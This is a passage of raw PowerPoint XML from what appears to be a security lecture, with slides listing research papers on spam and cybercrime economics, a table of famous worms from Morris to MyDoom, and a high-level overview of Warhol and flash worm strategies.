              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Working Group: Lessons Learned - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299373809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Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.icir.org/vern/papers/miscreant-wealth.ccs07.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Peek Inside A Professional Carding Shop, Brian Krebs - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://krebsonsecurity.com/2014/06/peek-inside-a-professional-carding-shop/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>An Analysis of Underground Forums  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~voelker/pubs/forums-imc11.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Spamalytics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: An Empirical Analysis of Spam Marketing Conversion - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~savage/papers/CCS08Conversion.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Spamcraft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: An Inside Look At Spam Campaign Orchestration  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~savage/papers/LEET09.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Click Trajectories: End-to-End Analysis of the Spam Value Chain - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~savage/papers/Oakland11.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>PharmaLeaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Understanding the Business of Online Pharmaceutical Affiliate Programs - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~savage/papers/UsenixSec12.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The Underground Economy of Fake Antivirus Software  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.cs.ucsb.edu/~vigna/publications/2011_stone_abman_kemmerer_kruegel_steigerwald_vigna_FakeAV.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13669020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Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Priceless: The Role of Payments in Abuse-advertised Goods - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~savage/papers/CCS12Priceless.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Characterizing Large-Scale Click Fraud in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ZeroAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~voelker/pubs/za-ccs14.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Serf and Turf: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Crowdturfing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> for Fun and Profit - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.ccs.neu.edu/home/cbw/pdf/crowdturfing-www12.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Dirty Jobs: The Role of Freelance Labor in Web Service Abuse - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~savage/papers/UsenixSec11-DJ.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Follow the Green: Growth and Dynamics in Twitter Follower Markets - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.cs.ucsb.edu/~gangw/twitter_imc13.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Dialing Back Abuse on Phone Verified Accounts - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.inwyrd.com/blog/wp-content/uploads/2014/08/ccs2014dialing.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3997969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1201A-13A4-4D9E-B643-147D10ACC55A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Famous Worms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06AE972E-7506-4803-81CE-6E491BF91906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1898168454"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="448235" y="2680176"/>
          <a:ext cx="11295529" cy="2834640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2010084">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3849228193"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1037915">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3426103481"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="8247530">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1037801619"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>Year</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="833307634"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Morris Worm</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>1988</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Exploited bugs in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>sendmail</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>fingerd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>, crashed the internet</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1565935626"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>ILOVEYOU</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>2000</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Email attachment, estimated $5.5-10 billion in damages</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3051334092"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Code Red</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>2001</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Exploited MS Index Server, infected 340k servers in 14 hours</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1498161430"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>Nimda</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>2001</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Used exploits in IE and IIS, spam and network drive infections</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1859234923"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>SQL Slammer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>2003</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Exploited MS SQL Server, entire vulnerable population infected in 10 minutes</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="582334161"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>MyDoom</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>2004</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>1 million infections, turned into a DDoS botnet</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1365384566"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C19B8A-F99B-4564-A2DC-96B1DF158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6482" y="140494"/>
            <a:ext cx="2539682" cy="2539682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1701608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9FF50-D8AB-431F-9B0F-6610363B3F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research Worms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99F886E9-D972-4A99-8F7E-9B2DED84DDC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed by researchers to spread as fast as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Warhol worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infect all vulnerable hosts in 15 minutes – 1 hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid repeat infections through optimized scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary search: after infection, new and old worm each scan half the remaining space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flash worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infect all vulnerable hosts in 30 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pre-scan the internet to identify a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hit list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of all vulnerable hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include the hit list with the worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D904110C-3569-4CDC-93F5-C618F0DF3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6482" y="140494"/>
            <a:ext cx="2539682" cy="2539682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2569763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FB6EB-1813-4122-8D67-5C526EE51B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
